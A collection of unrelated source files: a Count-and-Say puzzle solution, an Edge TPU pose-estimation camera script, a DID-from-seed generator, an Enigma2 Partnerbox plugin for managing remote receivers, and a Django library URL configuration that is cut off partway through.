filename | text
---|---|
the-stack_106_30530 | """
Runtime: 44 ms, faster than 92.75% of Python3 online submissions for Count and Say.
Memory Usage: 14.1 MB, less than 36.67% of Python3 online submissions for Count and Say.
"""
from typing import List
from typing import Optional
class Solution:
def countAndSay(self, n: int) -> str:
if n==1:
return '1'
else:
string = self.countAndSay(n-1)
if len(string)==1:
return '1'+str(string[0])
say = ''
counter = 1
for idx, char in enumerate(string):
if idx == 0:
continue
if char != string[idx-1]:
say = say + str(counter) + str(string[idx-1])
counter = 1
else:
counter += 1
if counter != 0:
say = say + str(counter) + str(string[-1])
return say
def main():
sol = Solution()
print('Output:', sol.countAndSay(4))
print('Expected:', '1211')
if __name__ == "__main__":
main()
|
the-stack_106_30532 | import sys
import argparse
import numpy as np
import cv2
import time
#from edgetpu.detection.engine import DetectionEngine
from edgetpu.basic.basic_engine import BasicEngine
keypointsMapping = ['Nose', 'Neck', 'R-Sho', 'R-Elb', 'R-Wr', 'L-Sho', 'L-Elb', 'L-Wr', 'R-Hip', 'R-Knee', 'R-Ank', 'L-Hip', 'L-Knee', 'L-Ank', 'R-Eye', 'L-Eye', 'R-Ear', 'L-Ear']
POSE_PAIRS = [[1,2], [1,5], [2,3], [3,4], [5,6], [6,7], [1,8], [8,9], [9,10], [1,11], [11,12], [12,13], [1,0], [0,14], [14,16], [0,15], [15,17], [2,17], [5,16]]
mapIdx = [[31,32], [39,40], [33,34], [35,36], [41,42], [43,44], [19,20], [21,22], [23,24], [25,26], [27,28], [29,30], [47,48], [49,50], [53,54], [51,52], [55,56], [37,38], [45,46]]
colors = [[0,100,255], [0,100,255], [0,255,255], [0,100,255], [0,255,255], [0,100,255], [0,255,0], [255,200,100], [255,0,255], [0,255,0], [255,200,100], [255,0,255], [0,0,255], [255,0,0], [200,200,0], [255,0,0], [200,200,0], [0,0,0]]
def getKeypoints(probMap, threshold=0.1):
mapSmooth = cv2.GaussianBlur(probMap, (3, 3), 0, 0)
mapMask = np.uint8(mapSmooth>threshold)
keypoints = []
contours = None
try:
# OpenCV 4.x returns (contours, hierarchy)
contours, _ = cv2.findContours(mapMask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
except ValueError:
# OpenCV 3.x returns (image, contours, hierarchy)
_, contours, _ = cv2.findContours(mapMask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
blobMask = np.zeros(mapMask.shape)
blobMask = cv2.fillConvexPoly(blobMask, cnt, 1)
maskedProbMap = mapSmooth * blobMask
_, maxVal, _, maxLoc = cv2.minMaxLoc(maskedProbMap)
keypoints.append(maxLoc + (probMap[maxLoc[1], maxLoc[0]],))
return keypoints
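# getKeypoints returns one (x, y, confidence) tuple per blob found in the smoothed
# confidence map; a running keypoint id is appended to each tuple later in main().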
def getValidPairs(outputs, w, h, detected_keypoints):
valid_pairs = []
invalid_pairs = []
n_interp_samples = 10
paf_score_th = 0.1
conf_th = 0.7
for k in range(len(mapIdx)):
pafA = outputs[0, mapIdx[k][0], :, :]
pafB = outputs[0, mapIdx[k][1], :, :]
pafA = cv2.resize(pafA, (w, h))
pafB = cv2.resize(pafB, (w, h))
candA = detected_keypoints[POSE_PAIRS[k][0]]
candB = detected_keypoints[POSE_PAIRS[k][1]]
nA = len(candA)
nB = len(candB)
if( nA != 0 and nB != 0):
valid_pair = np.zeros((0,3))
for i in range(nA):
max_j=-1
maxScore = -1
found = 0
for j in range(nB):
d_ij = np.subtract(candB[j][:2], candA[i][:2])
norm = np.linalg.norm(d_ij)
if norm:
d_ij = d_ij / norm
else:
continue
interp_coord = list(zip(np.linspace(candA[i][0], candB[j][0], num=n_interp_samples),
np.linspace(candA[i][1], candB[j][1], num=n_interp_samples)))
paf_interp = []
# use a separate index so the enclosing loop variable k is not shadowed
for m in range(len(interp_coord)):
paf_interp.append([pafA[int(round(interp_coord[m][1])), int(round(interp_coord[m][0]))],
pafB[int(round(interp_coord[m][1])), int(round(interp_coord[m][0]))] ])
paf_scores = np.dot(paf_interp, d_ij)
avg_paf_score = sum(paf_scores)/len(paf_scores)
if ( len(np.where(paf_scores > paf_score_th)[0]) / n_interp_samples ) > conf_th :
if avg_paf_score > maxScore:
max_j = j
maxScore = avg_paf_score
found = 1
if found:
valid_pair = np.append(valid_pair, [[candA[i][3], candB[max_j][3], maxScore]], axis=0)
valid_pairs.append(valid_pair)
else:
invalid_pairs.append(k)
valid_pairs.append([])
return valid_pairs, invalid_pairs
def getPersonwiseKeypoints(valid_pairs, invalid_pairs, keypoints_list):
personwiseKeypoints = -1 * np.ones((0, 19))
for k in range(len(mapIdx)):
if k not in invalid_pairs:
partAs = valid_pairs[k][:,0]
partBs = valid_pairs[k][:,1]
indexA, indexB = np.array(POSE_PAIRS[k])
for i in range(len(valid_pairs[k])):
found = 0
person_idx = -1
for j in range(len(personwiseKeypoints)):
if personwiseKeypoints[j][indexA] == partAs[i]:
person_idx = j
found = 1
break
if found:
personwiseKeypoints[person_idx][indexB] = partBs[i]
personwiseKeypoints[person_idx][-1] += keypoints_list[partBs[i].astype(int), 2] + valid_pairs[k][i][2]
elif not found and k < 17:
row = -1 * np.ones(19)
row[indexA] = partAs[i]
row[indexB] = partBs[i]
row[-1] = sum(keypoints_list[valid_pairs[k][i,:2].astype(int), 2]) + valid_pairs[k][i][2]
personwiseKeypoints = np.vstack([personwiseKeypoints, row])
return personwiseKeypoints
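# Note on the layout built above: each row of personwiseKeypoints has 19 entries --
# indices into keypoints_list for the 18 body parts (or -1 if a part is missing),
# plus an accumulated confidence score in the last column.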
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--model", default="models/train/test/tpu/mobilenet_v2_0.75_224/output_tflite_graph_edgetpu.tflite", help="Path of the inference model.")
parser.add_argument("--usbcamno", type=int, default=0, help="USB Camera number.")
parser.add_argument("--usbcamfps", type=int, default=30, help="USB Camera FPS.")
args = parser.parse_args()
camera_width = 320
camera_height = 240
fps = ""
framecount = 0
time1 = 0
elapsedTime = 0
h = 368
w = 432
new_w = int(camera_width * min(w/camera_width, h/camera_height))
new_h = int(camera_height * min(w/camera_width, h/camera_height))
threshold = 0.1
nPoints = 18
cap = cv2.VideoCapture(args.usbcamno)
cap.set(cv2.CAP_PROP_FPS, args.usbcamfps)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
cv2.namedWindow("USB Camera", cv2.WINDOW_AUTOSIZE)
# Initialize engine.
engine = BasicEngine(args.model)
# Run inference.
while True:
t1 = time.perf_counter()
ret, color_image = cap.read()
if not ret:
break
resized_image = cv2.resize(color_image, (new_w, new_h), interpolation = cv2.INTER_CUBIC)
prepimg = resized_image[:, :, ::-1].copy()
canvas = np.full((h, w, 3), 128)
canvas[(h - new_h)//2:(h - new_h)//2 + new_h,(w - new_w)//2:(w - new_w)//2 + new_w, :] = resized_image
prepimg = np.uint8(canvas).flatten()
#tinf = time.perf_counter()
#ans = engine.DetectWithImage(prepimg, threshold=0.5, keep_aspect_ratio=True, relative_coord=False, top_k=10)
#print("engine.required_input_array_size()=", engine.required_input_array_size()) #476928
#print("prepimg.flatten()=", len(prepimg)) #476928
ans = engine.RunInference(prepimg)
#print("len(ans)=", len(ans)) #2
#print("ans[0]=", ans[0]) #3.071000099182129
#print("ans[1]=", ans[1]) #[0.04705882 0.09411765 0.04705882 ... 0.07058824 0.23529412 0. ]
#print("len(ans[1])=", len(ans[1])) #141588=1x46x54x57 or 1x57x46x54
outputs = ans[1].reshape((1, 46, 54, 57)).transpose((0, 3, 1, 2)) #(1, 57, 46, 54)
#outputs = outputs[np.newaxis, :, :, :]
#outputs = ans[1].reshape((1, 57, 46, 54)) #(1, 57, 46, 54)
#print(time.perf_counter() - tinf, "sec")
#sys.exit(0)
detected_keypoints = []
keypoints_list = np.zeros((0, 3))
keypoint_id = 0
for part in range(nPoints):
probMap = outputs[0, part, :, :]
probMap = cv2.resize(probMap, (w, h)) # (432, 368)
keypoints = getKeypoints(probMap, threshold)
keypoints_with_id = []
for i in range(len(keypoints)):
keypoints_with_id.append(keypoints[i] + (keypoint_id,))
keypoints_list = np.vstack([keypoints_list, keypoints[i]])
keypoint_id += 1
detected_keypoints.append(keypoints_with_id)
frameClone = np.uint8(canvas.copy())
for i in range(nPoints):
for j in range(len(detected_keypoints[i])):
cv2.circle(frameClone, detected_keypoints[i][j][0:2], 5, colors[i], -1, cv2.LINE_AA)
valid_pairs, invalid_pairs = getValidPairs(outputs, w, h, detected_keypoints)
personwiseKeypoints = getPersonwiseKeypoints(valid_pairs, invalid_pairs, keypoints_list)
for i in range(17):
for n in range(len(personwiseKeypoints)):
index = personwiseKeypoints[n][np.array(POSE_PAIRS[i])]
if -1 in index:
continue
B = np.int32(keypoints_list[index.astype(int), 0])
A = np.int32(keypoints_list[index.astype(int), 1])
cv2.line(frameClone, (B[0], A[0]), (B[1], A[1]), colors[i], 3, cv2.LINE_AA)
cv2.putText(frameClone, fps, (w-170,15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (38,0,255), 1, cv2.LINE_AA)
cv2.imshow("USB Camera" , frameClone)
if cv2.waitKey(1)&0xFF == ord('q'):
break
# FPS calculation
framecount += 1
if framecount >= 5:
fps = "(Playback) {:.1f} FPS".format(time1/15)
framecount = 0
time1 = 0
t2 = time.perf_counter()
elapsedTime = t2-t1
time1 += 1/elapsedTime
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
|
the-stack_106_30533 | import os
import logging
import base64
import argparse
import asyncio
import sys
# Import server.anchor from the path relative to where the scripts are being executed.
sys.path.insert(1, './server')
from anchor import AnchorHandle
logging.getLogger().setLevel(logging.ERROR)
async def generate_did(seed):
TRUST_ANCHOR = AnchorHandle()
did, verkey = await TRUST_ANCHOR.seed_to_did(seed)
print(f"\nSeed: {seed}")
print(f"DID: {did}")
print(f"Verkey: {verkey}")
def main(seed):
loop = asyncio.get_event_loop()
loop.run_until_complete(generate_did(seed))
loop.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Generates a DID and Verkey from a Seed.")
parser.add_argument("--seed", required=True, default=os.environ.get('SEED'), help="The seed to use to generate the DID and Verkey.")
args, unknown = parser.parse_known_args()
testseed = args.seed
if testseed.endswith("="):
testseed = base64.b64decode(testseed).decode("ascii")
if len(testseed) != 32:
print("Seed must be 32 characters long.")
exit()
main(args.seed) |
the-stack_106_30534 | from __future__ import absolute_import
#
# Partnerbox E2
#
# $Id$
#
# Coded by Dr.Best (c) 2009
# Support: www.dreambox-tools.info
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
from enigma import eListboxPythonMultiContent, eListbox, gFont, \
RT_HALIGN_LEFT, RT_VALIGN_CENTER, getDesktop
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.MenuList import MenuList
from Components.Button import Button
from Components.config import config
from Components.ActionMap import ActionMap, NumberActionMap
from Components.ConfigList import ConfigList, ConfigListScreen
from Components.config import ConfigSubsection, ConfigSubList, ConfigIP, ConfigInteger, ConfigSelection, ConfigText, ConfigYesNo, getConfigListEntry, configfile
import skin
# for localized messages
from . import _
def initPartnerboxEntryConfig():
config.plugins.Partnerbox.Entries.append(ConfigSubsection())
i = len(config.plugins.Partnerbox.Entries) - 1
config.plugins.Partnerbox.Entries[i].name = ConfigText(default="Remote box", visible_width=50, fixed_size=False)
config.plugins.Partnerbox.Entries[i].ip = ConfigIP(default=[192, 168, 0, 98])
config.plugins.Partnerbox.Entries[i].port = ConfigInteger(default=80, limits=(1, 65535))
config.plugins.Partnerbox.Entries[i].enigma = ConfigSelection(default="0", choices=[("0", _("Enigma 2")), ("1", _("Enigma 1"))])
config.plugins.Partnerbox.Entries[i].password = ConfigText(default="root", visible_width=50, fixed_size=False)
config.plugins.Partnerbox.Entries[i].useinternal = ConfigSelection(default="1", choices=[("0", _("use external")), ("1", _("use internal"))])
config.plugins.Partnerbox.Entries[i].zaptoservicewhenstreaming = ConfigYesNo(default=True)
return config.plugins.Partnerbox.Entries[i]
def initConfig():
count = config.plugins.Partnerbox.entriescount.value
if count != 0:
i = 0
while i < count:
initPartnerboxEntryConfig()
i += 1
HD = False
if getDesktop(0).size().width() >= 1280:
HD = True
class PartnerboxSetup(ConfigListScreen, Screen):
if HD:
skin = """ <screen position="center,center" size="700,400" title="Partnerbox Setup" >
<widget name="config" position="10,10" size="680,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="10,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<widget name="key_green" position="300,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<widget name="key_yellow" position="550,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;17"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="10,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="300,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="yellow" pixmap="skin_default/buttons/yellow.png" position="550,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
else:
skin = """ <screen position="center,center" size="550,400" title="Partnerbox Setup" >
<widget name="config" position="20,10" size="510,330" scrollbarMode="showOnDemand" />
<widget name="key_red" position="0,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_green" position="140,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<widget name="key_yellow" position="280,350" size="140,40" valign="center" halign="center" zPosition="5" transparent="1" foregroundColor="white" font="Regular;18"/>
<ePixmap name="red" pixmap="skin_default/buttons/red.png" position="0,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="green" pixmap="skin_default/buttons/green.png" position="140,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
<ePixmap name="yellow" pixmap="skin_default/buttons/yellow.png" position="280,350" size="140,40" zPosition="4" transparent="1" alphatest="on"/>
</screen>"""
def __init__(self, session, args=None):
Screen.__init__(self, session)
self.setTitle(_("Partnerbox Setup"))
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self["key_yellow"] = Button(_("Partnerbox Entries"))
ConfigListScreen.__init__(self, [])
self.initConfig()
self["setupActions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"cancel": self.keyClose,
"red": self.keyClose,
"ok": self.keySave,
"yellow": self.PartnerboxEntries,
}, -2)
def initConfig(self):
self.list = []
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in Eventinfo menu"), config.plugins.Partnerbox.enablepartnerboxeventinfomenu))
if config.plugins.Partnerbox.enablepartnerboxeventinfomenu.value:
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in Event View context menu"), config.plugins.Partnerbox.enablepartnerboxeventinfocontextmenu))
self.list.append(getConfigListEntry(_("Show 'RemoteTimer' in E-Menu"), config.plugins.Partnerbox.showremotetimerinextensionsmenu))
self.list.append(getConfigListEntry(_("Show 'RemoteTV Player' in E-Menu"), config.plugins.Partnerbox.showremotetvinextensionsmenu))
self.list.append(getConfigListEntry(_("Show 'Stream current Service' in E-Menu"), config.plugins.Partnerbox.showcurrentstreaminextensionsmenu))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in TimerEvent"), config.plugins.Partnerbox.enablepartnerboxintimerevent))
if config.plugins.Partnerbox.enablepartnerboxintimerevent.value:
self.list.append(getConfigListEntry(_("Enable first Partnerbox-entry in Timeredit as default"), config.plugins.Partnerbox.enabledefaultpartnerboxintimeredit))
self.list.append(getConfigListEntry(_("Enable VPS-Function in TimerEvent"), config.plugins.Partnerbox.enablevpsintimerevent))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in EPGList"), config.plugins.Partnerbox.enablepartnerboxepglist))
if config.plugins.Partnerbox.enablepartnerboxepglist.value:
self.list.append(getConfigListEntry(_("Enable Red Button-Function in single/multi EPG"), config.plugins.Partnerbox.enablepartnerboxzapbuton))
self.list.append(getConfigListEntry(_("Show duration time for event"), config.plugins.Partnerbox.showremaingepglist))
self.list.append(getConfigListEntry(_("Show all icon for event in EPGList"), config.plugins.Partnerbox.allicontype))
self.list.append(getConfigListEntry(_("Enable Partnerbox-Function in Channel Selector"), config.plugins.Partnerbox.enablepartnerboxchannelselector))
self["config"].l.setList(self.list)
def keySave(self):
config.plugins.Partnerbox.showremotetvinextensionsmenu.save()
config.plugins.Partnerbox.showcurrentstreaminextensionsmenu.save()
config.plugins.Partnerbox.showremotetimerinextensionsmenu.save()
config.plugins.Partnerbox.enablepartnerboxintimerevent.save()
config.plugins.Partnerbox.enablepartnerboxepglist.save()
config.plugins.Partnerbox.enablepartnerboxzapbuton.save()
config.plugins.Partnerbox.enablepartnerboxchannelselector.save()
config.plugins.Partnerbox.enabledefaultpartnerboxintimeredit.save()
config.plugins.Partnerbox.enablepartnerboxeventinfomenu.save()
config.plugins.Partnerbox.enablepartnerboxeventinfocontextmenu.save()
config.plugins.Partnerbox.allicontype.save()
config.plugins.Partnerbox.showremaingepglist.save()
configfile.save()
self.refreshPlugins()
self.close(self.session)
def keyClose(self):
for x in self["config"].list:
x[1].cancel()
self.close(self.session)
def PartnerboxEntries(self):
self.session.open(PartnerboxEntriesListConfigScreen)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.initConfig()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.initConfig()
def refreshPlugins(self):
from Components.PluginComponent import plugins
from Tools.Directories import SCOPE_PLUGINS, resolveFilename
plugins.clearPluginList()
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class PartnerboxEntriesListConfigScreen(Screen):
skin = """
<screen position="center,center" size="550,400" title="Partnerbox: List of Entries" >
<widget name="name" position="5,0" size="200,50" font="Regular;20" halign="left"/>
<widget name="ip" position="215,0" size="140,50" font="Regular;20" halign="left"/>
<widget name="port" position="350,0" size="80,50" font="Regular;20" halign="left"/>
<widget name="type" position="430,0" size="120,50" font="Regular;20" halign="left"/>
<widget name="entrylist" position="0,50" size="550,300" scrollbarMode="showOnDemand"/>
<widget name="key_red" position="0,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="red" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_yellow" position="280,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="yellow" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_green" position="140,350" size="140,40" zPosition="5" valign="center" halign="center" backgroundColor="green" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_blue" position="420,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<ePixmap name="red" position="0,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/red.png" transparent="1" alphatest="on" />
<ePixmap name="yellow" position="280,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/yellow.png" transparent="1" alphatest="on" />
<ePixmap name="green" position="140,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/green.png" transparent="1" alphatest="on" />
<ePixmap name="blue" position="420,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/blue.png" transparent="1" alphatest="on" />
</screen>"""
def __init__(self, session, what=None):
Screen.__init__(self, session)
self.session = session
self.setTitle(_("Partnerbox: List of Entries"))
self["name"] = Button(_("Name"))
self["ip"] = Button(_("IP"))
self["port"] = Button(_("Port"))
self["type"] = Button(_("Enigma Type"))
self["key_red"] = Button(_("Add"))
self["key_yellow"] = Button(_("Edit"))
self["key_green"] = Button(_("Power"))
self["key_blue"] = Button(_("Delete"))
self["entrylist"] = PartnerboxEntryList([])
self["actions"] = ActionMap(["WizardActions", "MenuActions", "ShortcutActions"],
{
"ok": self.keyOK,
"back": self.keyClose,
"red": self.keyRed,
"yellow": self.keyYellow,
"blue": self.keyDelete,
"green": self.powerMenu,
}, -1)
self.what = what
self.updateList()
def updateList(self):
self["entrylist"].buildList()
def keyClose(self):
self.close(self.session, self.what, None)
def keyRed(self):
self.session.openWithCallback(self.updateList, PartnerboxEntryConfigScreen, None)
def keyOK(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
nr = int(config.plugins.Partnerbox.entriescount.value)
if (nr > 1 and self.what == 2) or (nr >= 1 and self.what is None):
from .plugin import RemoteTimer
self.session.open(RemoteTimer, sel)
else:
self.close(self.session, self.what, sel)
def keyYellow(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
self.session.openWithCallback(self.updateList, PartnerboxEntryConfigScreen, sel)
def keyDelete(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
self.session.openWithCallback(self.deleteConfirm, MessageBox, _("Really delete this Partnerbox Entry?"))
def deleteConfirm(self, result):
if not result:
return
sel = self["entrylist"].l.getCurrentSelection()[0]
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value - 1
config.plugins.Partnerbox.entriescount.save()
config.plugins.Partnerbox.Entries.remove(sel)
config.plugins.Partnerbox.Entries.save()
config.plugins.Partnerbox.save()
configfile.save()
self.updateList()
def powerMenu(self):
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
menu = []
menu.append((_("Wakeup"), 0))
menu.append((_("Standby"), 1))
menu.append((_("Restart enigma"), 2))
menu.append((_("Restart"), 3))
if int(sel.enigma.value) == 0:
menu.append((_("Toggle Standby"), 4))
menu.append((_("Deep Standby"), 5))
else:
menu.append((_("Shutdown"), 4))
from Screens.ChoiceBox import ChoiceBox
self.session.openWithCallback(self.menuCallback, ChoiceBox, title=(_("Select operation for partnerbox") + ": " + "%s" % (sel.name.value)), list=menu)
def menuCallback(self, choice):
if choice is None:
return
try:
sel = self["entrylist"].l.getCurrentSelection()[0]
except:
sel = None
if sel is None:
return
password = sel.password.value
username = "root"
ip = "%d.%d.%d.%d" % tuple(sel.ip.value)
port = sel.port.value
http = "http://%s:%d" % (ip, port)
enigma_type = int(sel.enigma.value)
sCommand = http
sCommand += enigma_type and "/cgi-bin/admin?command=" or "/web/powerstate?newstate="
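# The numeric states below follow the common Enigma2 web interface convention (an
# assumption, not verified here): 0=toggle standby, 1=deep standby, 2=reboot,
# 3=restart GUI, 4=wakeup, 5=standby; Enigma1 uses named /cgi-bin/admin commands instead.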
if choice[1] == 0:
sCommand += enigma_type and "wakeup" or "4"
elif choice[1] == 1:
sCommand += enigma_type and "standby" or "5"
elif choice[1] == 2:
sCommand += enigma_type and "restart" or "3"
elif choice[1] == 3:
sCommand += enigma_type and "reboot" or "2"
elif choice[1] == 4:
sCommand += enigma_type and "shutdown" or "0"
elif choice[1] == 5:
if enigma_type:
return
sCommand += "1"
else:
return
from .PartnerboxFunctions import sendPartnerBoxWebCommand
sendPartnerBoxWebCommand(sCommand, None, 3, username, password)
class PartnerboxEntryList(MenuList):
def __init__(self, list, enableWrapAround=True):
MenuList.__init__(self, list, enableWrapAround, eListboxPythonMultiContent)
font = skin.fonts.get("PartnerBoxEntryList0", ("Regular", 20, 20))
self.l.setFont(0, gFont(font[0], font[1]))
self.ItemHeight = int(font[2])
font = skin.fonts.get("PartnerBoxEntryList1", ("Regular", 18))
self.l.setFont(1, gFont(font[0], font[1]))
def postWidgetCreate(self, instance):
MenuList.postWidgetCreate(self, instance)
instance.setItemHeight(self.ItemHeight)
def buildList(self):
self.list = []
for c in config.plugins.Partnerbox.Entries:
res = [c]
x, y, w, h = skin.parameters.get("PartnerBoxEntryListName", (5, 0, 150, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(c.name.value)))
ip = "%d.%d.%d.%d" % tuple(c.ip.value)
x, y, w, h = skin.parameters.get("PartnerBoxEntryListIP", (120, 0, 150, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(ip)))
port = "%d" % (c.port.value)
x, y, w, h = skin.parameters.get("PartnerBoxEntryListPort", (270, 0, 100, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(port)))
if int(c.enigma.value) == 0:
e_type = "Enigma2"
else:
e_type = "Enigma1"
x, y, w, h = skin.parameters.get("PartnerBoxEntryListType", (410, 0, 100, 20))
res.append((eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 1, RT_HALIGN_LEFT | RT_VALIGN_CENTER, str(e_type)))
self.list.append(res)
self.l.setList(self.list)
self.moveToIndex(0)
class PartnerboxEntryConfigScreen(ConfigListScreen, Screen):
skin = """
<screen name="PartnerboxEntryConfigScreen" position="center,center" size="550,400" title="Partnerbox: Edit Entry">
<widget name="config" position="20,10" size="520,330" scrollbarMode="showOnDemand" />
<ePixmap name="red" position="0,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/red.png" transparent="1" alphatest="on" />
<ePixmap name="green" position="140,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/green.png" transparent="1" alphatest="on" />
<ePixmap name="blue" position="420,350" zPosition="4" size="140,40" pixmap="skin_default/buttons/blue.png" transparent="1" alphatest="on" />
<widget name="key_red" position="0,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_green" position="140,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
<widget name="key_blue" position="420,350" zPosition="5" size="140,40" valign="center" halign="center" font="Regular;21" transparent="1" foregroundColor="white" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, entry):
self.session = session
Screen.__init__(self, session)
self.setTitle(_("Partnerbox: Edit Entry"))
self["actions"] = ActionMap(["SetupActions", "ColorActions"],
{
"green": self.keySave,
"red": self.keyCancel,
"blue": self.keyDelete,
"cancel": self.keyCancel
}, -2)
self["key_red"] = Button(_("Cancel"))
self["key_green"] = Button(_("OK"))
self["key_blue"] = Button(_("Delete"))
if entry is None:
self.newmode = 1
self.current = initPartnerboxEntryConfig()
else:
self.newmode = 0
self.current = entry
cfglist = [
getConfigListEntry(_("Name"), self.current.name),
getConfigListEntry(_("IP"), self.current.ip),
getConfigListEntry(_("Port"), self.current.port),
getConfigListEntry(_("Enigma Type"), self.current.enigma),
getConfigListEntry(_("Password"), self.current.password),
getConfigListEntry(_("Servicelists/EPG"), self.current.useinternal),
getConfigListEntry(_("Zap to service when streaming"), self.current.zaptoservicewhenstreaming)
]
ConfigListScreen.__init__(self, cfglist, session)
def keySave(self):
if self.newmode == 1:
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value + 1
config.plugins.Partnerbox.entriescount.save()
ConfigListScreen.keySave(self)
config.plugins.Partnerbox.save()
configfile.save()
self.close()
def keyCancel(self):
if self.newmode == 1:
config.plugins.Partnerbox.Entries.remove(self.current)
ConfigListScreen.cancelConfirm(self, True)
def keyDelete(self):
if self.newmode == 1:
self.keyCancel()
else:
self.session.openWithCallback(self.deleteConfirm, MessageBox, _("Really delete this Partnerbox Entry?"))
def deleteConfirm(self, result):
if not result:
return
config.plugins.Partnerbox.entriescount.value = config.plugins.Partnerbox.entriescount.value - 1
config.plugins.Partnerbox.entriescount.save()
config.plugins.Partnerbox.Entries.remove(self.current)
config.plugins.Partnerbox.Entries.save()
config.plugins.Partnerbox.save()
configfile.save()
self.close()
|
the-stack_106_30536 | from django.urls import path
from . import views
urlpatterns = [
path("book/", views.BookViewSet.as_view({'get': 'list'})),
path("book/<int:pk>/", views.BookViewSet.as_view({'get': 'retrieve'})),
path("book/create", views.BookViewSet.as_view({'post': 'create'})),
path("book/<int:pk>/delete", views.BookViewSet.as_view({'delete': 'destroy'})),
path("book/<int:pk>/update", views.BookViewSet.as_view({'post': 'update'})),
path("reader/", views.ReaderViewSet.as_view({'get': 'list'})),
path("reader/<int:pk>/", views.ReaderViewSet.as_view({'get': 'retrieve'})),
path("reader/create", views.ReaderViewSet.as_view({'post': 'create'})),
path("reader/<int:pk>/delete", views.ReaderViewSet.as_view({'delete': 'destroy'})),
path("reader/<int:pk>/update", views.ReaderViewSet.as_view({'post': 'update'})),
path("taking_book/", views.TakingBookViewSet.as_view({'get': 'list'})),
path("taking_book/<int:pk>/", views.TakingBookViewSet.as_view({'get': 'retrieve'})),
path("taking_book/create", views.TakingBookViewSet.as_view({'post': 'create'})),
path("taking_book/<int:pk>/delete", views.TakingBookViewSet.as_view({'delete': 'destroy'})),
path("taking_book/<int:pk>/update", views.TakingBookViewSet.as_view({'post': 'update'})),
path("book_place/", views.BookPlaceViewSet.as_view({'get': 'list'})),
path("book_place/<int:pk>/", views.BookPlaceViewSet.as_view({'get': 'retrieve'})),
path("book_place/create", views.BookPlaceViewSet.as_view({'post': 'create'})),
path("book_place/<int:pk>/delete", views.BookPlaceViewSet.as_view({'delete': 'destroy'})),
